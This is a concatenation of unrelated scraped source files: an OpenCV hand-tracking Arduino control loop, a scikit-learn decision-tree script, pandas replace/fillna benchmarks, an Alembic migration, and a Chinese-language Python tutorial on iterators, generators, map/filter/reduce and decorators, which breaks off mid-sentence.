hand_tracker = HandTracker(rectangle_width[0], rectangle_height[0], rectangle_top_left_x[0],
rectangle_top_left_y[0], rectangle_color, rectangle_thickness)
component_name = ["Arduino", "LED to PIN D9", "LED bar", "LED dimming"]
object_assembler = ObjectAssembler()
while True:
success, img = cap.read()
resized_frame = cv2.resize(img, (new_width, new_height))
hand_tracker.draw(resized_frame)
resized_frame = hand_detector.draw_hand_landmarks(resized_frame)
landmark_list = hand_detector.find_hand_landmark_coordinates(resized_frame)
if hand_tracker.detect_hand_inside_area(landmark_list) == 1:
hand_tracker.set_green_color()
hand_tracker.set_object_assembled_true()
object_assembler.draw_previous_component(resized_frame=resized_frame, previous_top_left=(1, 1),
previous_bottom_right=(146, 1061), previous_color=(0, 0, 255),
previous_thickness = 20, text_content="Previous",
text_font=cv2.FONT_HERSHEY_SIMPLEX, text_font_scale=1.0,
text_color=(0, 0, 255), text_thickness=2)
object_assembler.draw_next_component(resized_frame=resized_frame, next_top_left=(1250, 1),
next_bottom_right=(1395, 1061), next_color=(0, 255, 0), next_thickness=20,
text_content="Next", text_font=cv2.FONT_HERSHEY_SIMPLEX,
text_font_scale=1.0, text_color=(0, 255, 0), text_thickness=2)
object_assembler.draw_work_area(resized_frame=resized_frame, work_area_top_left=(145, 300),
work_area_bottom_right=(1245, 1050), work_area_color=(255, 255, 255),
work_area_thickness=3, text_content="Work Area",
text_font=cv2.FONT_HERSHEY_SIMPLEX, text_font_scale=1.0,
text_color=(255, 255, 255), text_thickness=2)
object_assembler.draw_breadboard_outline(resized_frame=resized_frame, breadboard_top_left=(550, 400),
breadboard_bottom_right=(850, 850),
breadboard_outline_color=(0, 0, 255), breadboard_outline_thickness=2)
object_assembler.draw_component_area(resized_frame=resized_frame, component_area_top_left=(145, 1),
component_area_bottom_right=(1245, 295),
component_area_color=(255, 255, 255), component_area_thickness=2,
text_content="Component Area", text_font=cv2.FONT_HERSHEY_SIMPLEX,
text_font_scale=1.0, text_color=(255, 255, 255), text_thickness=2)
if object_assembler.detect_finger_inside_next_component(landmark_list, next_top_left=(1250, 1),
next_bottom_right=(1395, 1061)) == 1:
hand_tracker.set_object_assembled_false()
if i < 2:
i = i + 1
hand_tracker.reset_sizes(rectangle_width[i], rectangle_height[i], rectangle_top_left_x[i],
rectangle_top_left_y[i], rectangle_color, rectangle_thickness)
else:
gestureControl = True
if gestureControl == True:
i=3
try:
hand_tracker.gesture_control(landmark_list, resized_frame, arduino)
except UnboundLocalError:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
except serial.serialutil.SerialException:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
except NameError:
cv2.putText(resized_frame, "Connect the Arduino and restart!", (170, 400), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 0, 255), 6)
if object_assembler.detect_finger_inside_previous_component(landmark_list, previous_top_left=(1, 1),
previous_bottom_right=(146, 1061)) == 1:
hand_tracker.set_object_assembled_false()
gestureControl = False
if i == 0:
i = 2
else:
i = i - 1
hand_tracker.reset_sizes(rectangle_width[i], rectangle_height[i], rectangle_top_left_x[i],
rectangle_top_left_y[i], rectangle_color, rectangle_thickness)
if hand_tracker.object_assembled == True:
cv2.putText(resized_frame, component_name[i], (650, 280), cv2.FONT_HERSHEY_SIMPLEX, 2.0, (0, 255, 0), 4)
else: cv2.putText(resized_frame, component_name[i], (650, 280), cv2.FONT_HERSHEY_SIMPLEX, 2.0, (0, 0, 255), 4)
cv2.imshow('Scaled Video', resized_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
if __name__ == "__main__":
main()
# counter = 1
# a = 0
# b = 1
# print(a)
# print(b)
#
# while counter < 10:
# c = a+b
# a = b
# b = c
# print(c)
# counter = counter + 1
|
vladpasat/HandFlow0
|
handTrackingModule.py
|
handTrackingModule.py
|
py
| 16,607
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8099648005
|
import pandas as pd
import pydotplus
from IPython.display import Image
from sklearn import metrics
from sklearn.externals.six import StringIO
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_graphviz
# nazwy wszystkich kolumn z CSV
column_names = ['Elevation', 'Aspect', 'Slope', 'Horizontal_Distance_To_Hydrology', 'Vertical_Distance_To_Hydrology',
'Horizontal_Distance_To_Roadways', 'Hillshade_9am', 'Hillshade_Noon', 'Hillshade_3pm',
'Horizontal_Distance_To_Fire_Points', 'Wilderness_Area1', 'Wilderness_Area2', 'Wilderness_Area3',
'Wilderness_Area4', 'Soil_Type1', 'Soil_Type2', 'Soil_Type3', 'Soil_Type4', 'Soil_Type5', 'Soil_Type6',
'Soil_Type7', 'Soil_Type8', 'Soil_Type9', 'Soil_Type10', 'Soil_Type11', 'Soil_Type12', 'Soil_Type13',
'Soil_Type14', 'Soil_Type15', 'Soil_Type16', 'Soil_Type17', 'Soil_Type18', 'Soil_Type19', 'Soil_Type20',
'Soil_Type21', 'Soil_Type22', 'Soil_Type23', 'Soil_Type24', 'Soil_Type25', 'Soil_Type26', 'Soil_Type27',
'Soil_Type28', 'Soil_Type29', 'Soil_Type30', 'Soil_Type31', 'Soil_Type32', 'Soil_Type33', 'Soil_Type34',
'Soil_Type35', 'Soil_Type36', 'Soil_Type37', 'Soil_Type38', 'Soil_Type39', 'Soil_Type40', 'Cover_Type']
# wczytujemy dataset
dataset = pd.read_csv("covtype.csv", header=None, names=column_names)
# wydzielamy zmienne zaลeลผne
feature_cols = column_names[:-1]
X = dataset[feature_cols]
y = dataset.Cover_Type
# dzielimy dataset na zbiory do uczenia siฤ i testรณw
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
# trenujemy model
clf = DecisionTreeClassifier()
clf = clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("Dokลadnoลฤ: {}".format(metrics.accuracy_score(y_test, y_pred)))
dot_data = StringIO()
# generacja i eksport grafiki drzewka
# gลฤbokoลฤ ustawiamy na 5 bo przy wartoลci powyzฤj generuje siฤ godzinami
export_graphviz(clf, max_depth=5, out_file=dot_data, filled=True, rounded=True, special_characters=True,
feature_names=feature_cols)
print('Graphviz wygenerowany')
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
graph.write_png('trees.png')
Image(graph.create_png())
print('End of script.')
|
fedoruka/fct_classification
|
main.py
|
main.py
|
py
| 2,347
|
python
|
en
|
code
| 0
|
github-code
|
6
|
34004358765
|
import numpy as np
import pandas as pd
class FillNa:
params = [True, False]
param_names = ["inplace"]
def setup(self, inplace):
N = 10 ** 6
rng = pd.date_range("1/1/2000", periods=N, freq="min")
data = np.random.randn(N)
data[::2] = np.nan
self.ts = pd.Series(data, index=rng)
def time_fillna(self, inplace):
self.ts.fillna(0.0, inplace=inplace)
def time_replace(self, inplace):
self.ts.replace(np.nan, 0.0, inplace=inplace)
class ReplaceDict:
params = [True, False]
param_names = ["inplace"]
def setup(self, inplace):
N = 10 ** 5
start_value = 10 ** 5
self.to_rep = dict(enumerate(np.arange(N) + start_value))
self.s = pd.Series(np.random.randint(N, size=10 ** 3))
def time_replace_series(self, inplace):
self.s.replace(self.to_rep, inplace=inplace)
class ReplaceList:
# GH#28099
params = [(True, False)]
param_names = ["inplace"]
def setup(self, inplace):
self.df = pd.DataFrame({"A": 0, "B": 0}, index=range(4 * 10 ** 7))
def time_replace_list(self, inplace):
self.df.replace([np.inf, -np.inf], np.nan, inplace=inplace)
def time_replace_list_one_match(self, inplace):
# the 1 can be held in self._df.blocks[0], while the inf and -inf cant
self.df.replace([np.inf, -np.inf, 1], np.nan, inplace=inplace)
class Convert:
params = (["DataFrame", "Series"], ["Timestamp", "Timedelta"])
param_names = ["constructor", "replace_data"]
def setup(self, constructor, replace_data):
N = 10 ** 3
data = {
"Series": pd.Series(np.random.randint(N, size=N)),
"DataFrame": pd.DataFrame(
{"A": np.random.randint(N, size=N), "B": np.random.randint(N, size=N)}
),
}
self.to_replace = {i: getattr(pd, replace_data) for i in range(N)}
self.data = data[constructor]
def time_replace(self, constructor, replace_data):
self.data.replace(self.to_replace)
from .pandas_vb_common import setup # noqa: F401 isort:skip
|
Tommyhappy01/8-PANDAS
|
asv_bench/benchmarks/replace.py
|
replace.py
|
py
| 2,121
|
python
|
en
|
code
| 4
|
github-code
|
6
|
41682530680
|
"""add directory id to address
Revision ID: 19e625982be8
Revises: a9adfd3c2eba
Create Date: 2018-02-02 23:11:03.395662
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '19e625982be8'
down_revision = 'a9adfd3c2eba'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('address', sa.Column('directory_id', sa.Integer(), nullable=True), schema='monday')
op.create_index(op.f('ix_monday_address_directory_id'), 'address', ['directory_id'], unique=False, schema='monday')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_monday_address_directory_id'), table_name='address', schema='monday')
op.drop_column('address', 'directory_id', schema='monday')
# ### end Alembic commands ###
|
MondayHealth/provider-import
|
alembic/versions/19e625982be8_add_directory_id_to_address.py
|
19e625982be8_add_directory_id_to_address.py
|
py
| 973
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8366348060
|
# /usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import math
from dataclasses import dataclass
from functools import reduce
from functools import wraps
"""
่ฟญไปฃๅจ
่ฟญไปฃๆฏPythonๆๅผบๅคง็ๅ่ฝไนไธ๏ผๆฏ่ฎฟ้ฎ้ๅๅ
็ด ็ไธ็งๆนๅผใ
่ฟญไปฃๅจๆฏไธไธชๅฏไปฅ่ฎฐไฝ้ๅ็ไฝ็ฝฎ็ๅฏน่ฑกใ
่ฟญไปฃๅจๅฏน่ฑกไป้ๅ็็ฌฌไธไธชๅ
็ด ๅผๅง่ฎฟ้ฎ๏ผ็ดๅฐๆๆ็ๅ
็ด ่ขซ่ฎฟ้ฎๅฎ็ปๆใ่ฟญไปฃๅจๅช่ฝๅพๅไธไผๅ้
่ฟญไปฃๅจๆไธคไธชๅบๆฌ็ๆนๆณ๏ผ
iter() ๅๅปบ่ฟญไปฃๅจ
next() ่ทๅ่ฟญไปฃๅจ็ไธไธไธชๅ
็ด
ๅญ็ฌฆไธฒใๅ่กจใๅ
็ปๅฏน่ฑก ้ฝๅฏ็จไบๅๅปบ่ฟญไปฃๅจ
่ฟญไปฃๅจ็ปๆ็ๅผๅธธ
StopIteration
ๅๅปบ่ฟญไปฃๅจ
ๆไธไธช็ฑปไฝไธบไธไธช่ฟญไปฃๅจไฝฟ็จ้่ฆๅจ็ฑปไธญๅฎ็ฐไธคไธชๆนๆณ__iter__() ไธ __next__()
__iter__()ๆนๆณ่ฟๅไธไธช็นๆฎ็่ฟญไปฃๅจๅฏน่ฑก๏ผ่ฟไธช่ฟญไปฃๅจๅฏน่ฑกๅฎ็ฐไบ__next__()ๆนๆณๅนถ้่ฟStopIterationๅผๅธธๆ ่ฏ่ฟญไปฃ็ๅฎๆใ
__next__()ๆนๆณไผ่ฟๅไธไธไธช่ฟญไปฃๅจๅฏน่ฑก
ๅชๆๅฎ็ฐไบ__iter__()๏ผๆ่ฝๅจไฝฟ็จiter()็ๆถๅๅๅปบไธไธช่ฟญไปฃๅจ
ๅชๆๅฎ็ฐไบ__next__()๏ผๆ่ฝๅจไฝฟ็จnext()็ๆถๅ้่ฟ__next__()ๆ็
ง่งๅ่ทๅไธไธไธชๅผ
ๆณจๆ
ๅชๆๅฎ็ฐไบ__iter__()ๆนๆณ๏ผๆ่ฝไฝฟ็จiter()๏ผๅฏน่ฏฅ็ฑป็ๅฏน่ฑกๅๅปบ่ฟญไปฃๅจใไฝๆฏไธๆฏ่ฏดๅฎ็ฐไบ__iter__()ๆนๆณ๏ผๅฐฑๅทฒ็ปๅๅปบไบ่ฟญไปฃๅจใ่ฟๆฏๅ็ฌ็ๆฆๅฟตใ
ๅชๆๅฎ็ฐไบ__next__()๏ผๆ่ฝๅจไฝฟ็จnext()็ๆถๅ้่ฟ__next__()ๆ็
ง่งๅ่ทๅไธไธไธชๅผใไฝๆฏไธๆฏ่ฏดๆฒกๆๅฎ็ฐ__next__()๏ผๅฐฑไธ่ฝๅๅปบ่ฟญไปฃๅจไบใ
"""
"""
ๅฎ็ฐไบ่ฟญไปฃๅจๅฝๆฐ็็ฑป
"""
class iterationNum:
def __iter__(self):
self.num = 1
# ่ฟญไปฃๅจ่ฟญไปฃ็ๆฏๅฏน่ฑกใๆไปฅ่ฟ้้่ฆ่ฟๅselfใself่กจ็คบๅฏน่ฑก
return self
def __next__(self):
# ้่ฆๅ
ๆself.aไฟๅญ่ฟๅ๏ผๅๅ 1
# ้่ฆๅ
ๆself.numไฟๅญ๏ผ็จไบๅๅบ่ฟๅ๏ผ็ถๅๅ+1ใๅฆๅๅผๅง็ๅฐๆนๅฐฑไธๆฏ1ไบใๅฐฑๆฏ2ไบ
x = self.num
self.num += 1
return x
"""
่ฟญไปฃๅจ็ๅค็งไฝฟ็จๆนๅผ
"""
def mapLearn():
list = [1, 2, 3, 4] # ๅ่กจ
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ01")
mapL01 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
for mapl in mapL01:
# print(mapl)
# ไฝฟ็จendไฟฎๆน่พๅบ็ๆๅๅญ็ฌฆ๏ผ่ฟ้ๅฐๆข่กๆฟๆขไธบ็ฉบๆ ผ
print(mapl, end=" ")
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ02")
# ่ฟญไปฃๅจ่พๅบๅฎๅ๏ผไธ่ฝๅจ็จnext๏ผๅฆๅไผๆฅ้StopIteration
mapL02 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
print(next(mapL02))
print(next(mapL02))
print(next(mapL02))
print(next(mapL02))
# print(next(mapL02))
print("่ฟญไปฃๅจไฝฟ็จๆนๅผ03")
mapL03 = iter(list) # ไฝฟ็จๅ่กจๅๅปบ่ฟญไปฃๅจ
# i = True
# while i:
# try:
# mapl03 = next(mapL03)
# print(mapl03)
# except StopIteration:
# i = False
# print("่ฟญไปฃๅจ03ๅทฒ้ๅ็ปๆ")
while True:
try:
print(next(mapL03))
except StopIteration:
print("่ฟญไปฃๅจ03ๅทฒ้ๅ็ปๆ")
break
print("่ฟญไปฃๅจๅฏน่ฑกๅๅปบๅไฝฟ็จ")
itClass = iterationNum()
itN = iter(itClass)
# while True:
# try:
# b = next(itN)
# if b == 10:
# break;
# else:
# print(b)
# except StopIteration:
# break
while True:
try:
print(next(itN))
except StopIteration:
break
"""
็ๆๅจ
็จไบ็ๆ่ฟญไปฃๅจ
ๅจPythonไธญ๏ผไฝฟ็จyield็ๅฝๆฐ่ขซ็งฐไธบ็ๆๅจ(generator)
่ทๆฎ้ๅฝๆฐไธๅ็ๆฏ๏ผ็ๆๅจๆฏไธไธช่ฟๅ่ฟญไปฃๅจ็ๅฝๆฐ๏ผๅช่ฝ็จไบ่ฟญไปฃๆไฝใ
็ฎๅ็่งฃ๏ผ็ๆๅจๅฐฑๆฏไธไธช่ฟญไปฃๅจ
่ฐ็จไธไธช็ๆๅจๅฝๆฐ๏ผ่ฟๅ็ๆฏไธไธช่ฟญไปฃๅจๅฏน่ฑก
ๅจ่ฐ็จ็ๆๅจ่ฟ่ก็่ฟ็จไธญ๏ผๆฏๆฌก้ๅฐyieldๆถๅฝๆฐไผๆๅๅนถไฟๅญๅฝๅๆๆ็่ฟ่กไฟกๆฏ๏ผ่ฟๅyield็ๅผ๏ผๅนถๅจไธไธๆฌกๆง่กnext()ๆนๆณๆถไปๅฝๅไฝ็ฝฎ็ปง็ปญ่ฟ่กใ
ไฝฟ็จyield็ๆ่ฟญไปฃๅจ้่ฆ้
ๅๅพช็ฏไฝฟ็จ
ๆ่ฐ็ๆๅจๅฐฑๆฏๅฉ็จๅพช็ฏๅฐๆไธชๅ้ๆๆไธชๅผๆดๅๅฐไธ่ตท๏ผไฝไธบไธไธช่ฟญไปฃๅจ่ฟๅ
ไนๅฏไปฅ็่งฃไธบๅฐๆณ่ฆ็ๆฐๆดๅๅฐไธ่ตท๏ผไฝไธบไธไธช่ฟญไปฃๅจ่ฟๅ
"""
"""
็ๆๅจๅฝๆฐ
ๆๆณข้ฃๅฅๆฐๅ
"""
def fibonacci(n):
a, b, counter = 0, 1, 0
while True:
if (counter > n):
return
yield a
a, b = b, a + b
counter += 1
"""
็ๆๅจๅฝๆฐ็ปไน
ไฝฟ็จyield็ๆ่ฟญไปฃๅจ๏ผ้่ฆ้
ๅๅพช็ฏไฝฟ็จ
"""
def yieldTest(n):
i = 0
while True:
yield i
if i <= n:
i += 1
else:
return
"""
็ๆๅจ็ไฝฟ็จ็ปไน
"""
def yieldLearn():
print("้่ฟ็ๆๅจๅฎ็ฐ:ๆๆณข้ฃๅฅๆฐๅ")
fi = fibonacci(10)
while True:
try:
print(next(fi))
except StopIteration:
break
print("่ชๅฎไน็ๆๅจๅฎ็ฐ")
yt = yieldTest(10)
while True:
try:
print(next(yt))
except StopIteration:
break
"""
map&filter&reduce
ๅฝๆฐๅผ็ผ็จ็ไปฃ่กจ
ๅ
็ฝฎๅฝๆฐmapๅfilterๆฏๅจๅ่กจ(ๆ็ฑปไผผ็็งฐไธบ่ฟญไปฃ็ๅฏน่ฑก)ไธ่ฟ่ก็้ๅธธๆ็จ็้ซ้ถๅฝๆฐ
ๅฝๆฐmapๆฅๅไธไธชๅฝๆฐๅไธไธช่ฟญไปฃๅจไฝไธบๅๆฐ๏ผๅนถ่ฟๅไธไธชๆฐ็่ฟญไปฃๅจ๏ผ่ฏฅๅฝๆฐๅบ็จไบๆฏไธชๅๆฐ
map()
ไฝฟ็จ่ฟญไปฃๅจๆๆๅฎ่งๅ็ๆ่ฟญไปฃๅจ
ๆ นๆฎๆไพ็ๅฝๆฐๅฏนๆๅฎๅบๅๅๆ ๅฐ
่ฏญๆณ:
map(function, iterable, ...)
ๅๆฐ:
function ๅฝๆฐ
iterable ไธไธชๆๅคไธชๅบๅ
่ฟๅๅผ:
Python2.x ่ฟๅๅ่กจ
Python3.x ่ฟๅ่ฟญไปฃๅจ
่งฃ้๏ผ
็ฌฌไธไธชๅๆฐfunctionไปฅๅๆฐๅบๅiterableไธญ็ๆฏไธไธชๅ
็ด ่ฐ็จfunctionๅฝๆฐ
่ฟๅๅ
ๅซๆฏๆฌกfunctionๅฝๆฐ่ฟๅๅผ็ๆฐๅ่กจ
"""
"""
ๅฝๆฐๅผ็ผ็จmap()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏmap
่ฎก็ฎๅนณๆนๆฐ
"""
def square(x):
return x ** 2
"""
map()ไฝฟ็จ็ปไน
"""
def mapLearn():
list = [1, 2, 3, 4, 5]
# ๅฏนlistไธญ็ๆฏไธไธชๅ
็ด ๆ็
งsquare่ฟ่กๅค็๏ผๅนถ่ฟๅ็ปๆ้๏ผไฝไธบ่ฟญไปฃๅจ่ฟๅ
print("ไฝฟ็จๅฝๆฐๅฎ็ฐmap()")
mL01 = map(square, list)
for ml in mL01:
print(ml)
# ไฝฟ็จlambdaๅฎ็ฐ
print("ไฝฟ็จlambda่กจ่พพๅผๅฎ็ฐmap()")
mL02 = map(lambda x: x ** 2, list)
while True:
try:
print(next(mL02))
except StopIteration:
break
"""
ไฝฟ็จไธคไธชๅ่กจไฝไธบไธคไธชๅๆฐ
ไฝฟ็จlambdaๆฅๅไธคไธชๅๆฐ่ฟ่กmap()่ฎก็ฎ
"""
print("ไฝฟ็จlambda่ฎก็ฎไธคไธช่ฟญไปฃๅจๅฎ็ฐmap()")
listX = [1, 2, 3, 4, 5]
listY = [-1, -2, -3, -4, -5]
mL03 = map(lambda x, y: x + y, listX, listY)
for ml03 in mL03:
print(ml03)
"""
filter()
filter()ๅฝๆฐ็จไบ่ฟๆปคๅบๅ๏ผ่ฟๆปคๆไธ็ฌฆๅๆกไปถ็ๅ
็ด ๏ผ่ฟๅ็ฑ็ฌฆๅๆกไปถๅ
็ด ็ปๆ็ๆฐๅ่กจ
่ฏญๆณ๏ผ
filter(function, iterable)
ๅๆฐ๏ผ
function ๅคๆญๅฝๆฐ
iterable ๅฏ่ฟญไปฃๅฏน่ฑก
่ฟๅๅผ๏ผ
Python2.x ่ฟๅๅ่กจ
Python3.x ่ฟๅๅฏ่ฟญไปฃๅฏน่ฑก
่งฃ้๏ผ
ๆฅๆถไธคไธชๅๆฐ๏ผ็ฌฌไธไธชๆฏๅฝๆฐ๏ผ็ฌฌไบไธชๆฏๅบๅ๏ผๅบๅ็ๆฏไธชๅ
็ด ไฝไธบๅๆฐไผ ้็ปๅฝๆฐ่ฟ่กๅคๆญใ
็ถๅ่ฟๅTrueๆFalse๏ผๆๅๅฐ่ฟๅTrue็ๅ
็ด ๆพๅฐๆฐๅ่กจไธญ
"""
"""
ๅฝๆฐๅผ็ผ็จfilter()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏfilter
ๅคๆญๆฏๅฆๅๆฐ
"""
def isOdd(n):
return n % 2 == 1
"""
filterไฝฟ็จ็ปไน
"""
def filterLearn():
list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print("ไฝฟ็จๅฝๆฐๅฎ็ฐfilter")
fL01 = filter(isOdd, list)
for fl in fL01:
print(fl)
print("ไฝฟ็จlambdaๅฎ็ฐfilter")
fL02 = filter(lambda x: x % 2 == 1, list)
while True:
try:
print(next(fL02))
except StopIteration:
break
print("ไฝฟ็จfilter่ฟๆปค้ค1~100ไธญๅนณๆนๆ นๆฏๆดๆฐ็ๆฐ")
fL03 = filter(lambda x: math.sqrt(x) % 1 == 0, range(1, 101, 1))
for fl03 in fL03:
print(fl03)
"""
reduce()
reduce()ๅฝๆฐไผๅฏนๅๆฐๅบๅไธญๅ
็ด ่ฟ่ก็ดฏ็งฏ
่ฏญๆณ๏ผ
reduce(function, iterable[, initializer])
ๅๆฐ๏ผ
function ๅฝๆฐ๏ผๆไธคไธชๅๆฐ
iterable ๅฏ่ฟญไปฃๅฏน่ฑก
initializer ๅฏ้๏ผๅๅงๅๆฐ
่ฟๅๅผ๏ผ
ๅฝๆฐ่ฎก็ฎ็ปๆ
่งฃ้๏ผ
ๅฝๆฐๅฐไธไธชๆฐๆฎ้ๅ(้พ่กจ๏ผๅ
็ป็ญ)ไธญ็ๆๆๆฐๆฎ่ฟ่กไธๅๆไฝ๏ผ
็จไผ ็ปreduceไธญ็ๅฝๆฐfunction(ๆไธคไธชๅๆฐ)ๅ
ๅฏน้ๅไธญ็็ฌฌ1ใ2ไธชๅ
็ด ่ฟ่กๆไฝ
ๅพๅฐ็็ปๆๅไธ็ฌฌไธไธชๆฐๆฎ็จfunctionๅฝๆฐ่ฟ็ฎ๏ผๆๅๅพๅฐไธไธช็ปๆ
ไนๅฐฑๆฏ่ฏดๆiterableไธญ็ๆๆๅผ่ฟ่กfunction่ฎก็ฎ๏ผๅพๅฐไธไธช่ฎก็ฎ็ปๆ
ๆณจๆ๏ผ
Python3.x reduce()ๅทฒ็ป่ขซ็งปๅจๅฐfunctoolsๆจกๅ้๏ผๅฆๆ่ฆไฝฟ็จ๏ผ้่ฆๅผๅ
ฅfunctoolsๆจกๅๆฅ่ฐ็จreduce()ๅฝๆฐ
from functools import reduce
"""
"""
ๅฝๆฐๅผ็ผ็จreduce()้ซ้ถๅฝๆฐ็็ปไน
"""
"""
ๅฎไนไธไธชๅฝๆฐ็จไบๆต่ฏreduce
ๅ ๆณ
"""
def addRed(x, y):
return x + y
"""
reduceไฝฟ็จ็ปไน
"""
def reduceLearn():
list = [1, 2, 3, 4, 5]
rL01 = reduce(addRed, list)
print("ไฝฟ็จๅฝๆฐๅฎ็ฐreduce")
print(rL01)
print("ไฝฟ็จlambdaๅฎ็ฐreduce")
rL02 = reduce(lambda x, y: x + y, list)
print(rL02)
print("ไฝฟ็จreduce่ฎก็ฎ1-100็ๅ")
rL03 = reduce(lambda x, y: x + y, range(1, 101, 1))
print(rL03)
print("ไฝฟ็จreduce่ฎก็ฎ1-100็็งฏ")
rL04 = reduce(lambda x, y: x * y, range(1, 101, 1))
print(rL04)
"""
่ฃ
้ฅฐๅจ
่ฃ
้ฅฐๅจ(Decorators)ๆฏPython็ไธไธช้่ฆ้จๅใ
็ฎๅ็่ฏด๏ผไปไปฌๆฏไฟฎๆนๅ
ถไปๅฝๆฐ็ๅ่ฝ็ๅฝๆฐใ
ๆๅฉไบ่ฎฉไปฃ็ ๆด็ฎๅ๏ผๆดPythonic(Python่ๅฟ)ใ
้่ฆ็ฅ้ๅจๅช้ไฝฟ็จ่ฃ
้ฅฐๅจ๏ผไปฅๅๅฆไฝๅผๅ่ฃ
้ฅฐๅจใ
่ฃ
้ฅฐๅจๆฏๅพๅจไธไธชๅฝๆฐ็ๅๅๆง่กไปฃ็
ๅทฅๅๆจกๅผ๏ผ
่ฃ
้ฅฐๅจๅฉๅ็จๆดๅฐใๆด็ฎๅ็ไปฃ็ ๆฅๅฎ็ฐๅคๆ็้ป่พ๏ผๅนถๅจๅ
ถไปๅฐๆนๅฎ็ฐ้็จใ
่ฃ
้ฅฐๅจๅฐฑๆฏๅฎไนไธไธชๅตๅฅๅฝๆฐ๏ผๅทฒไธไธชๅฝๆฐไฝไธบๅๆฐ๏ผๅจๅตๅฅๅฝๆฐไธญๆๅๆฐๅฝๆฐๅๅๅ ไธไธ่ฏญๅฅ๏ผ็ถๅๆๅตๅฅๅฝๆฐไฝไธบ่ฟๅๅผใ่ฟๆ ทๅฐฑ็ธๅฝไบไฟฎๆนไบๅๆฐๅฝๆฐ็ๅ่ฝ
ๆณจๆ๏ผ
่ฃ
้ฅฐๅจๅฏไปฅไฝฟ็จ็ฑป็ๆนๅผๅฎ็ฐใๅจ็ฑปไธญ็จไธ้ข็ๅฝๆฐๅๆ ่ฎฐๅฎ็ฐ่ฃ
้ฅฐๅจ็ฑป
__call__
@wraps(func)
่ฃ
้ฅฐๅจๅ
่ฃ
functools.wraps ่ฃ
้ฅฐๅจไฟฎ้ฅฐๅฝๆฐ
@wraps
ๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญๅ่ฝใ
่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆง
@่ฃ
้ฅฐๅจๅ็งฐ
ๅจๅฝๆฐๅ้ขๅ @+่ฃ
้ฅฐๅจๅ็งฐ๏ผ่กจ็คบไฝฟ็จๆๅฎ็่ฃ
้ฅฐๅจๅฏน่ฏฅๅฝๆฐ่ฟ่ก่ฃ
้ฅฐใ
ๅจๅ้ขไฝฟ็จ่ฏฅๅฝๆฐ็ๆฏ๏ผๅฐฑๆฏๅทฒ็ป็ป่ฟ่ฃ
้ฅฐ็ๅ่ฝไบ
่ฃ
้ฅฐๅจๅธธ็จๅฎ็ฐ
ๆๆๆฃๆฅ
ๆฅๅฟๅฎ็ฐ
่ฃ
้ฅฐๅจ็ฑป
ๅ้้ฎไปถ
...
่ฃ
้ฅฐๅจๅฎไนๅไฝฟ็จๆ ๅ่ฏญๅฅ
from functools import wraps
def decorator_name(f):
@wraps(f)
def decorated(*args, **kwargs):
if not can_run:
return "Function will not run"
return f(*args, **kwargs)
return decorated
@decorator_name
def func():
return("Function is running")
can_run = True
print(func())
# Output: Function is running
can_run = False
print(func())
# Output: Function will not run
ๅธธ่ง่ฃ
้ฅฐๅจ
https://zhuanlan.zhihu.com/p/602457512
@classmethod: ๅฃฐๆไธไธช็ฑปๆนๆณ๏ผๅฏไปฅ้่ฟ็ฑปๅ็ดๆฅ่ฐ็จใ
python็ฑปไธญๆไธ็งๆนๆณ็ฑปๅ๏ผ
Instance methods(ๅฎไพๆนๆณ)๏ผ
็ปๅฎไธไธชๅฎไพ็ๆนๆณ๏ผๅฉ็จ่ฟ็งๆนๆณๅฏไปฅ่ฎฟ้ฎๅไฟฎๆนๅฎไพๆฐๆฎใ
้่ฟ็ฑป็ๅฎไพ่ฐ็จๅฎไพๆนๆณ๏ผ้่ฟselfๅๆฐ่ฎฟ้ฎๅฎไพๆฐๆฎใ
็ฌฌไธไธชๅๆฐๆฏ่ช่บซใ
Class methods(็ฑปๆนๆณ)๏ผ
@classmethod
็ปๅฎไธไธช็ฑป็ๆนๆณ๏ผๆ ๆณๅฉ็จ่ฏฅๆนๆณไฟฎๆนๅฎไพๆฐๆฎใ
ๆฏ่ฐ็จ็ฑป่ช่บซ็ไธ็งๆนๆณ๏ผๅฎๅฐ็ฑปไฝไธบ็ฌฌไธไธชๅๆฐ๏ผ้ๅธธๅฐๅ
ถๅฝๅไธบcls
Static methods(้ๆๆนๆณ)๏ผ
@staticmethod
ไธ็ปๅฎๅฎไพๆ็ฑป็ๆนๆณใไป
ไป
ๅ ไธบไปไปฌๅจ้ป่พไธๅฑไบ้ฃไธช็ฑป๏ผๆ่ขซๅ
ๅซ่ฟๆฅใ
้ๆๆนๆณ้ๅธธ็จไบๆง่กไธ็ป็ธๅ
